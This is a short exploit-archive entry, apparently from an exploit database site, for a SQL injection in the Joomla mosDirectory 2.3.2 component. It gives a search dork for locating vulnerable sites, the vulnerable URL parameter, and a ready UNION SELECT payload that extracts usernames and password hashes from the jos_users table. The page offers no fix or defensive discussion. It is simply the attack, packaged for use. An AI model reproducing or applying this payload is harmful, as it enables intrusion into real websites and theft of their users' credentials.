Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability
# Published : 2008-02-03
# Author : GoLd_M
# Previous Title : Web Wiz Forums <= 9.07 (sub) Remote Directory Traversal Vulnerability
# Next Title : A-Blog V.2 (id) XSS / Remote SQL Injection Exploit

###########################################################################################
### Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability      ###
### Script :  :(                                                                          ###
### Dork : inurl:index.php?option=com_directory                                         ###
### Injection Adress : /index.php?option=com_directory&page=viewcat&catid=[SQL Code]    ###
### SQL Code :                                                                          ###
###   -1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*  ###
###                                     aNa TrYaGi                                      ###
###########################################################################################

# www.Syue.com [2008-02-03]